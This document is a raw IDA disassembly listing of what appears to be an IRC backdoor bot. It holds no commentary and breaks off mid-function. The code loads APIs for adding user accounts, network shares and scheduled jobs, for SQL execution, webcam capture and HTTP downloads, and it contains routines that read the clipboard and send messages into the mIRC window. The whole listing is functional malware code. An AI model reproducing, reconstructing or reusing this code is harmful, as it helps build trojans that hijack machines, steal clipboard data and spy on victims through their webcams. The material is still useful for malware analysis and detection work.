loc_409FCB: ; CODE XREF: sub_40981F+501�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE7C, eax
loc_409FD6: ; CODE XREF: sub_40981F+6A0�j
; sub_40981F+6AC�j ...
mov ds:dword_43AE78, 1
loc_409FE0: ; CODE XREF: sub_40981F+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz loc_40A0E5
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; sub_4E0076
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov ds:dword_43ACDC, eax
call esi ; sub_4E0076
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov ds:dword_43AC68, eax
call esi ; sub_4E0076
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov ds:dword_43AD60, eax
call esi ; sub_4E0076
push offset aInternetconnec ; "InternetConnectA"
push edi
mov ds:dword_43AD14, eax
call esi ; sub_4E0076
push offset aInternetopena ; "InternetOpenA"
push edi
mov ds:dword_43AD6C, eax
call esi ; sub_4E0076
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov ds:dword_43AD30, eax
call esi ; sub_4E0076
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov ds:dword_43ACA8, eax
call esi ; sub_4E0076
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov ds:dword_43ACA0, eax
call esi ; sub_4E0076
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov ds:dword_43ACB0, eax
call esi ; sub_4E0076
cmp ds:dword_43ACDC, ebx
mov ecx, ds:dword_43AD30
mov ds:dword_43ADCC, eax
jz short loc_40A0C1
cmp ds:dword_43AC68, ebx
jz short loc_40A0C1
cmp ds:dword_43AD60, ebx
jz short loc_40A0C1
cmp ds:dword_43AD14, ebx
jz short loc_40A0C1
cmp ds:dword_43AD6C, ebx
jz short loc_40A0C1
cmp ecx, ebx
jz short loc_40A0C1
cmp ds:dword_43ACA8, ebx
jz short loc_40A0C1
cmp ds:dword_43ACA0, ebx
jz short loc_40A0C1
cmp ds:dword_43ACB0, ebx
jz short loc_40A0C1
cmp eax, ebx
jnz short loc_40A0CB
loc_40A0C1: ; CODE XREF: sub_40981F+860�j
; sub_40981F+868�j ...
mov ds:dword_43AE80, 1
loc_40A0CB: ; CODE XREF: sub_40981F+8A0�j
cmp ecx, ebx
jz short loc_40A100
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov ds:dword_43AD48, eax
jnz short loc_40A100
jmp short loc_40A0FA
; ---------------------------------------------------------------------------
loc_40A0E5: ; CODE XREF: sub_40981F+7CC�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE84, eax
mov ds:dword_43AE80, 1
loc_40A0FA: ; CODE XREF: sub_40981F+8C4�j
mov ds:dword_43AD48, ebx
loc_40A100: ; CODE XREF: sub_40981F+8AE�j
; sub_40981F+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A14A
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; sub_4E0076
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov ds:dword_43AD24, eax
call esi ; sub_4E0076
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov ds:dword_43AE50, eax
call esi ; sub_4E0076
cmp ds:dword_43AD24, ebx
mov ds:dword_43ACBC, eax
jz short loc_40A155
cmp ds:dword_43AE50, ebx
jz short loc_40A155
cmp eax, ebx
jnz short loc_40A15F
jmp short loc_40A155
; ---------------------------------------------------------------------------
loc_40A14A: ; CODE XREF: sub_40981F+8EC�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE8C, eax
loc_40A155: ; CODE XREF: sub_40981F+91B�j
; sub_40981F+923�j ...
mov ds:dword_43AE88, 1
loc_40A15F: ; CODE XREF: sub_40981F+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz loc_40A255
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; sub_4E0076
push offset aNetsharedel ; "NetShareDel"
push edi
mov ds:dword_43AC98, eax
call esi ; sub_4E0076
push offset aNetshareenum ; "NetShareEnum"
push edi
mov ds:dword_43AC70, eax
call esi ; sub_4E0076
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov ds:dword_43ACE4, eax
call esi ; sub_4E0076
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov ds:dword_43AD18, eax
call esi ; sub_4E0076
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov ds:dword_43AE28, eax
call esi ; sub_4E0076
push offset aNetuseradd ; "NetUserAdd"
push edi
mov ds:dword_43ACD0, eax
call esi ; sub_4E0076
push offset aNetuserdel ; "NetUserDel"
push edi
mov ds:dword_43AC7C, eax
call esi ; sub_4E0076
push offset aNetuserenum ; "NetUserEnum"
push edi
mov ds:dword_43AC6C, eax
call esi ; sub_4E0076
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov ds:dword_43AD00, eax
call esi ; sub_4E0076
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov ds:dword_43ADF0, eax
call esi ; sub_4E0076
cmp ds:dword_43AC98, ebx
mov ds:dword_43ADA8, eax
jz short loc_40A260
cmp ds:dword_43AC70, ebx
jz short loc_40A260
cmp ds:dword_43ACE4, ebx
jz short loc_40A260
cmp ds:dword_43AD18, ebx
jz short loc_40A260
cmp ds:dword_43AE28, ebx
jz short loc_40A260
cmp ds:dword_43ACD0, ebx
jz short loc_40A260
cmp ds:dword_43AC7C, ebx
jz short loc_40A260
cmp ds:dword_43AC6C, ebx
jz short loc_40A260
cmp ds:dword_43AD00, ebx
jz short loc_40A260
cmp ds:dword_43ADF0, ebx
jz short loc_40A260
cmp eax, ebx
jnz short loc_40A26A
jmp short loc_40A260
; ---------------------------------------------------------------------------
loc_40A255: ; CODE XREF: sub_40981F+94B�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE94, eax
loc_40A260: ; CODE XREF: sub_40981F+9E6�j
; sub_40981F+9EE�j ...
mov ds:dword_43AE90, 1
loc_40A26A: ; CODE XREF: sub_40981F+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A29F
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; sub_4E0076
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov ds:dword_43ACC0, eax
call esi ; sub_4E0076
cmp ds:dword_43ACC0, ebx
mov ds:dword_43AD90, eax
jz short loc_40A2AA
cmp eax, ebx
jnz short loc_40A2B4
jmp short loc_40A2AA
; ---------------------------------------------------------------------------
loc_40A29F: ; CODE XREF: sub_40981F+A56�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE9C, eax
loc_40A2AA: ; CODE XREF: sub_40981F+A78�j
; sub_40981F+A7E�j
mov ds:dword_43AE98, 1
loc_40A2B4: ; CODE XREF: sub_40981F+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A2E9
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; sub_4E0076
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov ds:dword_43AE14, eax
call esi ; sub_4E0076
cmp ds:dword_43AE14, ebx
mov ds:dword_43AE10, eax
jz short loc_40A2F4
cmp eax, ebx
jnz short loc_40A2FE
jmp short loc_40A2F4
; ---------------------------------------------------------------------------
loc_40A2E9: ; CODE XREF: sub_40981F+AA0�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AEA4, eax
loc_40A2F4: ; CODE XREF: sub_40981F+AC2�j
; sub_40981F+AC8�j
mov ds:dword_43AEA0, 1
loc_40A2FE: ; CODE XREF: sub_40981F+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A35D
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; sub_4E0076
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov ds:dword_43AE40, eax
call esi ; sub_4E0076
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov ds:dword_43AE38, eax
call esi ; sub_4E0076
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov ds:dword_43AE00, eax
call esi ; sub_4E0076
cmp ds:dword_43AE40, ebx
mov ds:dword_43ACD8, eax
jz short loc_40A368
cmp ds:dword_43AE38, ebx
jz short loc_40A368
cmp ds:dword_43AE00, ebx
jz short loc_40A368
cmp eax, ebx
jnz short loc_40A372
jmp short loc_40A368
; ---------------------------------------------------------------------------
loc_40A35D: ; CODE XREF: sub_40981F+AEA�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AEAC, eax
loc_40A368: ; CODE XREF: sub_40981F+B26�j
; sub_40981F+B2E�j ...
mov ds:dword_43AEA8, 1
loc_40A372: ; CODE XREF: sub_40981F+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A3A7
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; sub_4E0076
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov ds:dword_43AD0C, eax
call esi ; sub_4E0076
cmp ds:dword_43AD0C, ebx
mov ds:dword_43AE0C, eax
jz short loc_40A3B2
cmp eax, ebx
jnz short loc_40A3BC
jmp short loc_40A3B2
; ---------------------------------------------------------------------------
loc_40A3A7: ; CODE XREF: sub_40981F+B5E�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AEB4, eax
loc_40A3B2: ; CODE XREF: sub_40981F+B80�j
; sub_40981F+B86�j
mov ds:dword_43AEB0, 1
loc_40A3BC: ; CODE XREF: sub_40981F+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A445
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; sub_4E0076
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov ds:dword_43ADD4, eax
call esi ; sub_4E0076
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov ds:dword_43AE20, eax
call esi ; sub_4E0076
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov ds:dword_43AD5C, eax
call esi ; sub_4E0076
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov ds:dword_43AD1C, eax
call esi ; sub_4E0076
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov ds:dword_43ADB4, eax
call esi ; sub_4E0076
cmp ds:dword_43ADD4, ebx
mov ds:dword_43AD28, eax
jz short loc_40A450
cmp ds:dword_43AE20, ebx
jz short loc_40A450
cmp ds:dword_43AD5C, ebx
jz short loc_40A450
cmp ds:dword_43AD1C, ebx
jz short loc_40A450
cmp ds:dword_43ADB4, ebx
jz short loc_40A450
cmp eax, ebx
jnz short loc_40A45A
jmp short loc_40A450
; ---------------------------------------------------------------------------
loc_40A445: ; CODE XREF: sub_40981F+BA8�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AEBC, eax
loc_40A450: ; CODE XREF: sub_40981F+BFE�j
; sub_40981F+C06�j ...
mov ds:dword_43AEB8, 1
loc_40A45A: ; CODE XREF: sub_40981F+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz short loc_40A48F
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; sub_4E0076
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov ds:dword_43ACF0, eax
call esi ; sub_4E0076
cmp ds:dword_43ACF0, ebx
mov ds:dword_43ADC8, eax
jz short loc_40A49A
cmp eax, ebx
jnz short loc_40A4A4
jmp short loc_40A49A
; ---------------------------------------------------------------------------
loc_40A48F: ; CODE XREF: sub_40981F+C46�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AEC4, eax
loc_40A49A: ; CODE XREF: sub_40981F+C68�j
; sub_40981F+C6E�j
mov ds:dword_43AEC0, 1
loc_40A4A4: ; CODE XREF: sub_40981F+C6C�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40981F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A4AC proc near ; CODE XREF: sub_40EE72+57D3�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_43AE58, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40A4F4
push ds:dword_43AE5C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A4F4: ; CODE XREF: sub_40A4AC+1A�j
cmp ds:dword_43AE60, esi
jz short loc_40A528
push ds:dword_43AE64
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A528: ; CODE XREF: sub_40A4AC+4E�j
cmp ds:dword_43AE68, esi
jz short loc_40A55C
push ds:dword_43AE6C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A55C: ; CODE XREF: sub_40A4AC+82�j
cmp ds:dword_43AE70, esi
jz short loc_40A590
push ds:dword_43AE74
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A590: ; CODE XREF: sub_40A4AC+B6�j
cmp ds:dword_43AE78, esi
jz short loc_40A5C4
push ds:dword_43AE7C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A5C4: ; CODE XREF: sub_40A4AC+EA�j
cmp ds:dword_43AE80, esi
jz short loc_40A5F8
push ds:dword_43AE84
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A5F8: ; CODE XREF: sub_40A4AC+11E�j
cmp ds:dword_43AE88, esi
jz short loc_40A62C
push ds:dword_43AE8C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A62C: ; CODE XREF: sub_40A4AC+152�j
cmp ds:dword_43AE90, esi
jz short loc_40A660
push ds:dword_43AE94
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A660: ; CODE XREF: sub_40A4AC+186�j
cmp ds:dword_43AE98, esi
jz short loc_40A694
push ds:dword_43AE9C
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A694: ; CODE XREF: sub_40A4AC+1BA�j
cmp ds:dword_43AEA0, esi
jz short loc_40A6C8
push ds:dword_43AEA4
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A6C8: ; CODE XREF: sub_40A4AC+1EE�j
cmp ds:dword_43AEA8, esi
jz short loc_40A6FC
push ds:dword_43AEAC
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A6FC: ; CODE XREF: sub_40A4AC+222�j
cmp ds:dword_43AEB0, esi
jz short loc_40A730
push ds:dword_43AEB4
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A730: ; CODE XREF: sub_40A4AC+256�j
cmp ds:dword_43AEB8, esi
jz short loc_40A764
push ds:dword_43AEBC
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A764: ; CODE XREF: sub_40A4AC+28A�j
cmp ds:dword_43AEC0, esi
jz short loc_40A798
push ds:dword_43AEC4
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 20h
loc_40A798: ; CODE XREF: sub_40A4AC+2BE�j
lea eax, [ebp+var_200]
push offset unk_42D764
push eax
call sub_4172B0
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40A7C5
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_40A7C5: ; CODE XREF: sub_40A4AC+302�j
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A4AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7D7 proc near ; CODE XREF: sub_40EE72+C5E�p
; sub_40EE72+C92�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_40A862
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_40A862
cmp [ebp+arg_8], esi
jz short loc_40A862
cmp byte ptr [eax], 0
jz short loc_40A862
push ebx
push edi
call sub_42274B
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_40A85D
push [ebp+arg_4]
push edi
call sub_417880
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40A856
sub eax, edi
push eax
push edi
push ebx
call sub_418C10
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_417AB0
push eax
push [ebp+arg_8]
push ebx
call sub_418DE0
push [ebp+arg_4]
call sub_417AB0
add eax, esi
push eax
push ebx
call sub_4179D0
push ebx
push edi
call sub_4179C0
add esp, 30h
mov esi, edi
loc_40A856: ; CODE XREF: sub_40A7D7+3C�j
push ebx
call sub_417C3B
pop ecx
loc_40A85D: ; CODE XREF: sub_40A7D7+2B�j
mov eax, esi
pop ebx
jmp short loc_40A864
; ---------------------------------------------------------------------------
loc_40A862: ; CODE XREF: sub_40A7D7+C�j
; sub_40A7D7+13�j ...
xor eax, eax
loc_40A864: ; CODE XREF: sub_40A7D7+89�j
pop edi
pop esi
pop ebp
retn
sub_40A7D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A868 proc near ; CODE XREF: sub_40ECFA+E9�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_417330
mov esi, [ebp+arg_0]
push esi
call sub_417AB0
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_40A89E
loc_40A899: ; DATA XREF: _2:00428424�o _2:00428468�o ...
or eax, 0FFFFFFFFh
jmp short loc_40A911
; ---------------------------------------------------------------------------
loc_40A89E: ; CODE XREF: sub_40A868+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_40A8C0
loc_40A8AA: ; CODE XREF: sub_40A868+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_40A8B7
cmp dl, 0Dh
jnz short loc_40A8BB
loc_40A8B7: ; CODE XREF: sub_40A868+48�j
and byte ptr [ecx+esi], 0
loc_40A8BB: ; CODE XREF: sub_40A868+4D�j
inc ecx
cmp ecx, eax
jl short loc_40A8AA
loc_40A8C0: ; CODE XREF: sub_40A868+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_40A8F1
lea edi, [ebp+var_7CC]
loc_40A8CD: ; CODE XREF: sub_40A868+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_40A8EC
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_40A8EC
cmp ebx, 1F4h
jge short loc_40A8F1
mov [edi], ecx
inc ebx
add edi, 4
loc_40A8EC: ; CODE XREF: sub_40A868+69�j
; sub_40A868+74�j
inc edx
cmp edx, eax
jl short loc_40A8CD
loc_40A8F1: ; CODE XREF: sub_40A868+5D�j
; sub_40A868+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_40A90F
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_417390
add esp, 0Ch
loc_40A90F: ; CODE XREF: sub_40A868+8E�j
mov eax, ebx
loc_40A911: ; CODE XREF: sub_40A868+34�j
pop esi
pop ebx
leave
retn
sub_40A868 endp
; =============== S U B R O U T I N E =======================================
sub_40A915 proc near ; CODE XREF: sub_40A96F+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_40A94E
push ebx
mov ebx, edi
loc_40A932: ; CODE XREF: sub_40A915+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_40A951
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_40A932
pop ebx
loc_40A94E: ; CODE XREF: sub_40A915+18�j
pop edi
pop esi
retn
sub_40A915 endp
; =============== S U B R O U T I N E =======================================
sub_40A951 proc near ; CODE XREF: sub_40A915+25�p
; sub_40A96F+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_419101
cmp al, 61h
pop ecx
jl short loc_40A96C
cmp al, 7Ah
jg short loc_40A96C
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_40A96C: ; CODE XREF: sub_40A951+E�j
; sub_40A951+12�j
xor eax, eax
retn
sub_40A951 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A96F proc near ; CODE XREF: sub_40C04D+10�p
; sub_40C07F+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_417B30
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_417AB0
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_417AB0
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_40A915
add esp, 14h
dec esi
mov edi, esi
loc_40A9AD: ; CODE XREF: sub_40A96F+B6�j
test esi, esi
jle short loc_40AA2B
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_419101
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_419101
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40AA23
loc_40A9D3: ; CODE XREF: sub_40A96F+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_40A951
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_40A9F4
mov eax, ecx
loc_40A9F4: ; CODE XREF: sub_40A96F+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40AA27
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_419101
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_419101
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_40A9D3
loc_40AA23: ; CODE XREF: sub_40A96F+62�j
dec edi
dec esi
jmp short loc_40A9AD
; ---------------------------------------------------------------------------
loc_40AA27: ; CODE XREF: sub_40A96F+8A�j
xor eax, eax
jmp short loc_40AA30
; ---------------------------------------------------------------------------
loc_40AA2B: ; CODE XREF: sub_40A96F+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_40AA30: ; CODE XREF: sub_40A96F+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A96F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA35 proc near ; CODE XREF: sub_40EE72+3C8C�p
; sub_40EE72+4AF5�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_42408C ;; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_424104 ;; FormatMessageA
lea eax, [ebp+var_100]
loc_40AA6E: ; CODE XREF: sub_40AA35+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40AA7A
cmp cl, 9
jnz short loc_40AA7D
loc_40AA7A: ; CODE XREF: sub_40AA35+3E�j
inc eax
jmp short loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AA7D: ; CODE XREF: sub_40AA35+43�j
; sub_40AA35+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40AA97
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40AA7D
cmp cl, 21h
jl short loc_40AA7D
loc_40AA97: ; CODE XREF: sub_40AA35+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_43AEC8
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41782A
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AA35 endp
; =============== S U B R O U T I N E =======================================
sub_40AABF proc near ; CODE XREF: sub_40EE72+5732�p
push esi
push 0
call ds:dword_43AD68 ;; OpenClipboard
test eax, eax
jz short loc_40AAF6
push 1
call ds:dword_43AD88 ;; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40AAF6
push edi
push esi
call ds:dword_42410C ;; GlobalLock
push esi
mov edi, eax
call ds:dword_424108 ;; GlobalUnlock
call ds:dword_43ADEC ;; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40AAF6: ; CODE XREF: sub_40AABF+B�j
; sub_40AABF+19�j
xor eax, eax
pop esi
retn
sub_40AABF endp
; =============== S U B R O U T I N E =======================================
sub_40AAFA proc near ; CODE XREF: sub_40EE72+48BF�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc ; "mIRC"
push esi
push edi
call ds:dword_43ADA4 ;; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40AB76
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:off_424114
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:off_424000
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_4172B0
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_43ADF4 ;; SendMessageA
push esi
push 1
push 4C9h
push ebp
call ds:dword_43ADF4 ;; SendMessageA
push ebx
call ds:off_424110
push edi
call ds:off_424078
push 1
pop eax
pop ebx
jmp short loc_40AB78
; ---------------------------------------------------------------------------
loc_40AB76: ; CODE XREF: sub_40AAFA+16�j
xor eax, eax
loc_40AB78: ; CODE XREF: sub_40AAFA+7A�j
pop edi
pop esi
